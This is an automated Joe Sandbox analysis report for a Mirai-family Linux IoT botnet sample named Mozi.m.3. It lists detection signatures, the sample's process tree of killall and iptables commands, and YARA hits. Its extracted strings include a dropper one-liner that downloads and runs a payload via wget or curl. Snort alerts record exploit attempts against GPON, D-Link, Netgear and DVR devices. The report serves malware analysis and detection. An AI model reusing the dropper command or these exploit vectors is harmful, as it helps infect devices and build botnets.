Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
Mozi.m.3

Overview

General Information

Sample Name:Mozi.m.3
Analysis ID:562113
MD5:eec5c6c219535fba3a0492ea8118b397
SHA1:292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256:12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Antivirus detection for dropped file
Sample tries to persist itself using System V runlevels
Opens /proc/net/* files useful for finding connected devices and routers
Sample tries to persist itself using /etc/profile
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Uses known network protocols on non-standard ports
Found strings indicative of a multi-platform dropper
Sample reads /proc/mounts (often used for finding a writable filesystem)
Terminates several processes with shell command 'killall'
Writes ELF files to disk
Yara signature match
Writes shell script files to disk
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Writes HTML files containing JavaScript to disk
Sample contains strings that are potentially command strings
Sample contains strings indicative of password brute-forcing capabilities
Sample has stripped symbol table
Sample tries to set the executable flag
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.
Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:562113
Start date:28.01.2022
Start time:13:56:42
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 7m 59s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:Mozi.m.3
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal100.spre.troj.evad.lin3@0/486@5/0
  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100
  • Created / dropped Files have been reduced to 100
  • VT rate limit hit for: http://%s:%d/Mozi.m;$
Command:/tmp/Mozi.m.3
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:telnetd: no process found
utelnetd: no process found
scfgmgr: no process found
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
/bin/sh: 1: cfgtool: not found
/bin/sh: 1: cfgtool: not found
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
qemu: uncaught target signal 4 (Illegal instruction) - core dumped
Unsupported ioctl: cmd=0xffffffff80045705
  • system is lnxubuntu20
  • Mozi.m.3 (PID: 5220, Parent: 5118, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/Mozi.m.3
    • Mozi.m.3 New Fork (PID: 5222, Parent: 5220)
      • Mozi.m.3 New Fork (PID: 5224, Parent: 5222)
        • Mozi.m.3 New Fork (PID: 5226, Parent: 5224)
        • sh (PID: 5226, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
          • sh New Fork (PID: 5229, Parent: 5226)
          • killall (PID: 5229, Parent: 5226, MD5: cd2adedbee501869ac691b88af39cd8b) Arguments: killall -9 telnetd utelnetd scfgmgr
        • Mozi.m.3 New Fork (PID: 5230, Parent: 5224)
        • Mozi.m.3 New Fork (PID: 5232, Parent: 5224)
        • Mozi.m.3 New Fork (PID: 5234, Parent: 5224)
          • Mozi.m.3 New Fork (PID: 5251, Parent: 5234)
          • sh (PID: 5251, Parent: 5234, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 41039 -j ACCEPT"
            • sh New Fork (PID: 5255, Parent: 5251)
            • iptables (PID: 5255, Parent: 5251, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 41039 -j ACCEPT
          • Mozi.m.3 New Fork (PID: 5260, Parent: 5234)
          • sh (PID: 5260, Parent: 5234, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 41039 -j ACCEPT"
            • sh New Fork (PID: 5262, Parent: 5260)
            • iptables (PID: 5262, Parent: 5260, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 41039 -j ACCEPT
          • Mozi.m.3 New Fork (PID: 5263, Parent: 5234)
          • sh (PID: 5263, Parent: 5234, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 41039 -j ACCEPT"
            • sh New Fork (PID: 5265, Parent: 5263)
            • iptables (PID: 5265, Parent: 5263, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I PREROUTING -t nat -p tcp --destination-port 41039 -j ACCEPT
          • Mozi.m.3 New Fork (PID: 5268, Parent: 5234)
          • sh (PID: 5268, Parent: 5234, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 41039 -j ACCEPT"
            • sh New Fork (PID: 5270, Parent: 5268)
            • iptables (PID: 5270, Parent: 5268, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I POSTROUTING -t nat -p tcp --source-port 41039 -j ACCEPT
          • Mozi.m.3 New Fork (PID: 5271, Parent: 5234)
          • sh (PID: 5271, Parent: 5234, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 41039 -j ACCEPT"
            • sh New Fork (PID: 5273, Parent: 5271)
            • iptables (PID: 5273, Parent: 5271, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 41039 -j ACCEPT
          • Mozi.m.3 New Fork (PID: 5274, Parent: 5234)
          • sh (PID: 5274, Parent: 5234, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 41039 -j ACCEPT"
            • sh New Fork (PID: 5276, Parent: 5274)
            • iptables (PID: 5276, Parent: 5274, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 41039 -j ACCEPT
          • Mozi.m.3 New Fork (PID: 5277, Parent: 5234)
          • sh (PID: 5277, Parent: 5234, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 41039 -j ACCEPT"
            • sh New Fork (PID: 5279, Parent: 5277)
            • iptables (PID: 5279, Parent: 5277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I PREROUTING -t nat -p tcp --dport 41039 -j ACCEPT
          • Mozi.m.3 New Fork (PID: 5280, Parent: 5234)
          • sh (PID: 5280, Parent: 5234, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 41039 -j ACCEPT"
            • sh New Fork (PID: 5282, Parent: 5280)
            • iptables (PID: 5282, Parent: 5280, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I POSTROUTING -t nat -p tcp --sport 41039 -j ACCEPT
        • Mozi.m.3 New Fork (PID: 5238, Parent: 5224)
        • Mozi.m.3 New Fork (PID: 5242, Parent: 5224)
        • Mozi.m.3 New Fork (PID: 5249, Parent: 5224)
        • Mozi.m.3 New Fork (PID: 5285, Parent: 5224)
        • sh (PID: 5285, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
          • sh New Fork (PID: 5287, Parent: 5285)
          • iptables (PID: 5287, Parent: 5285, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
        • Mozi.m.3 New Fork (PID: 5288, Parent: 5224)
        • sh (PID: 5288, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
          • sh New Fork (PID: 5290, Parent: 5288)
          • iptables (PID: 5290, Parent: 5288, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
        • Mozi.m.3 New Fork (PID: 5291, Parent: 5224)
        • sh (PID: 5291, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
          • sh New Fork (PID: 5293, Parent: 5291)
          • iptables (PID: 5293, Parent: 5291, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 58000 -j DROP
        • Mozi.m.3 New Fork (PID: 5294, Parent: 5224)
        • sh (PID: 5294, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
          • sh New Fork (PID: 5296, Parent: 5294)
          • iptables (PID: 5296, Parent: 5294, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
        • Mozi.m.3 New Fork (PID: 5297, Parent: 5224)
        • sh (PID: 5297, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
        • Mozi.m.3 New Fork (PID: 5299, Parent: 5224)
        • sh (PID: 5299, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
        • Mozi.m.3 New Fork (PID: 5301, Parent: 5224)
        • sh (PID: 5301, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
          • sh New Fork (PID: 5303, Parent: 5301)
          • iptables (PID: 5303, Parent: 5301, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
        • Mozi.m.3 New Fork (PID: 5304, Parent: 5224)
        • sh (PID: 5304, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
          • sh New Fork (PID: 5306, Parent: 5304)
          • iptables (PID: 5306, Parent: 5304, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
        • Mozi.m.3 New Fork (PID: 5307, Parent: 5224)
        • sh (PID: 5307, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
          • sh New Fork (PID: 5309, Parent: 5307)
          • iptables (PID: 5309, Parent: 5307, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
        • Mozi.m.3 New Fork (PID: 5310, Parent: 5224)
        • sh (PID: 5310, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
          • sh New Fork (PID: 5312, Parent: 5310)
          • iptables (PID: 5312, Parent: 5310, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
        • Mozi.m.3 New Fork (PID: 5313, Parent: 5224)
        • sh (PID: 5313, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
          • sh New Fork (PID: 5315, Parent: 5313)
          • iptables (PID: 5315, Parent: 5313, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
        • Mozi.m.3 New Fork (PID: 5316, Parent: 5224)
        • sh (PID: 5316, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
          • sh New Fork (PID: 5318, Parent: 5316)
          • iptables (PID: 5318, Parent: 5316, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
        • Mozi.m.3 New Fork (PID: 5319, Parent: 5224)
        • sh (PID: 5319, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
          • sh New Fork (PID: 5321, Parent: 5319)
          • iptables (PID: 5321, Parent: 5319, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 35000 -j DROP
        • Mozi.m.3 New Fork (PID: 5322, Parent: 5224)
        • sh (PID: 5322, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
          • sh New Fork (PID: 5324, Parent: 5322)
          • iptables (PID: 5324, Parent: 5322, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 50023 -j DROP
        • Mozi.m.3 New Fork (PID: 5325, Parent: 5224)
        • sh (PID: 5325, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
          • sh New Fork (PID: 5327, Parent: 5325)
          • iptables (PID: 5327, Parent: 5325, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
        • Mozi.m.3 New Fork (PID: 5328, Parent: 5224)
        • sh (PID: 5328, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
          • sh New Fork (PID: 5330, Parent: 5328)
          • iptables (PID: 5330, Parent: 5328, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
        • Mozi.m.3 New Fork (PID: 5332, Parent: 5224)
        • sh (PID: 5332, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
          • sh New Fork (PID: 5334, Parent: 5332)
          • iptables (PID: 5334, Parent: 5332, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 7547 -j DROP
        • Mozi.m.3 New Fork (PID: 5335, Parent: 5224)
        • sh (PID: 5335, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
          • sh New Fork (PID: 5337, Parent: 5335)
          • iptables (PID: 5337, Parent: 5335, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
        • Mozi.m.3 New Fork (PID: 5347, Parent: 5224)
        • sh (PID: 5347, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT"
          • sh New Fork (PID: 5349, Parent: 5347)
          • iptables (PID: 5349, Parent: 5347, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT
        • Mozi.m.3 New Fork (PID: 5350, Parent: 5224)
        • sh (PID: 5350, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT"
          • sh New Fork (PID: 5352, Parent: 5350)
          • iptables (PID: 5352, Parent: 5350, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT
        • Mozi.m.3 New Fork (PID: 5353, Parent: 5224)
        • sh (PID: 5353, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT"
          • sh New Fork (PID: 5355, Parent: 5353)
          • iptables (PID: 5355, Parent: 5353, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT
        • Mozi.m.3 New Fork (PID: 5356, Parent: 5224)
        • sh (PID: 5356, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT"
          • sh New Fork (PID: 5358, Parent: 5356)
          • iptables (PID: 5358, Parent: 5356, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT
        • Mozi.m.3 New Fork (PID: 5359, Parent: 5224)
        • sh (PID: 5359, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --dport 4000 -j ACCEPT"
          • sh New Fork (PID: 5361, Parent: 5359)
          • iptables (PID: 5361, Parent: 5359, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p udp --dport 4000 -j ACCEPT
        • Mozi.m.3 New Fork (PID: 5362, Parent: 5224)
        • sh (PID: 5362, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT"
          • sh New Fork (PID: 5364, Parent: 5362)
          • iptables (PID: 5364, Parent: 5362, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT
        • Mozi.m.3 New Fork (PID: 5365, Parent: 5224)
        • sh (PID: 5365, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT"
          • sh New Fork (PID: 5367, Parent: 5365)
          • iptables (PID: 5367, Parent: 5365, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT
        • Mozi.m.3 New Fork (PID: 5368, Parent: 5224)
        • sh (PID: 5368, Parent: 5224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT"
          • sh New Fork (PID: 5370, Parent: 5368)
          • iptables (PID: 5370, Parent: 5368, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT
  • cleanup
SourceRuleDescriptionAuthorStrings
Mozi.m.3SUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
  • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
Mozi.m.3JoeSecurity_Mirai_8Yara detected MiraiJoe Security
    Mozi.m.3JoeSecurity_Mirai_9Yara detected MiraiJoe Security
      Mozi.m.3JoeSecurity_Mirai_6Yara detected MiraiJoe Security
        Mozi.m.3JoeSecurity_Mirai_4Yara detected MiraiJoe Security
          SourceRuleDescriptionAuthorStrings
          /usr/networksSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
          • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
          /usr/networksJoeSecurity_Mirai_8Yara detected MiraiJoe Security
            /usr/networksJoeSecurity_Mirai_9Yara detected MiraiJoe Security
              /usr/networksJoeSecurity_Mirai_6Yara detected MiraiJoe Security
                /usr/networksJoeSecurity_Mirai_4Yara detected MiraiJoe Security
                  SourceRuleDescriptionAuthorStrings
                  5222.1.0000000078984474.00000000a6149ca3.rw-.sdmpJoeSecurity_Mirai_4Yara detected MiraiJoe Security
                    5220.1.0000000078984474.00000000a6149ca3.rw-.sdmpJoeSecurity_Mirai_4Yara detected MiraiJoe Security
                      5220.1.00000000de7858ea.00000000135d740d.r-x.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
                      • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
                      • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
                      • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
                      • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
                      • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
                      5220.1.00000000de7858ea.00000000135d740d.r-x.sdmpJoeSecurity_Mirai_5Yara detected MiraiJoe Security
                        5220.1.00000000de7858ea.00000000135d740d.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
                          Click to see the 14 entries

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: Mozi.m.3Avira: detected
                          Source: Mozi.m.3Virustotal: Detection: 65%Perma Link
                          Source: Mozi.m.3Metadefender: Detection: 68%Perma Link
                          Source: Mozi.m.3ReversingLabs: Detection: 75%
                          Source: /usr/networksAvira: detection malicious, Label: LINUX/Mirai.lldau

                          Spreading

                          barindex
                          Source: /tmp/Mozi.m.3 (PID: 5234)Opens: /proc/net/route
                          Source: /tmp/Mozi.m.3 (PID: 5234)Opens: /proc/net/route
                          Source: Mozi.m.3String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                          Source: Mozi.m.3String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
                          Source: Mozi.m.3String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                          Source: networks.12.drString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                          Source: networks.12.drString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
                          Source: networks.12.drString: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'

                          Networking

                          barindex
                          Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:47852 -> 201.49.46.204:80
                          Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:47852 -> 201.49.46.204:80
                          Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:41138 -> 176.32.230.19:80
                          Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:41138 -> 176.32.230.19:80
                          Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:37034 -> 173.249.33.238:80
                          Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:37034 -> 173.249.33.238:80
                          Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:33768 -> 201.20.107.209:8080
                          Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:33768 -> 201.20.107.209:8080
                          Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:50306 -> 23.11.243.9:80
                          Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:50306 -> 23.11.243.9:80
                          Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.11.243.9:80 -> 192.168.2.23:50306
                          Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:54856 -> 81.108.37.251:80
                          Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.1.122.127:80 -> 192.168.2.23:55982
                          Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48454 -> 186.219.131.213:80
                          Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.57.42.173:80 -> 192.168.2.23:54054
                          Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48454 -> 186.219.131.213:80
                          Source: TrafficSnort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.23:58926 -> 34.120.140.43:8080
                          Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:47780 -> 104.116.174.45:80
                          Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:47780 -> 104.116.174.45:80
                          Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.116.174.45:80 -> 192.168.2.23:47780
                          Source: TrafficSnort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:40214 -> 38.86.17.103:80
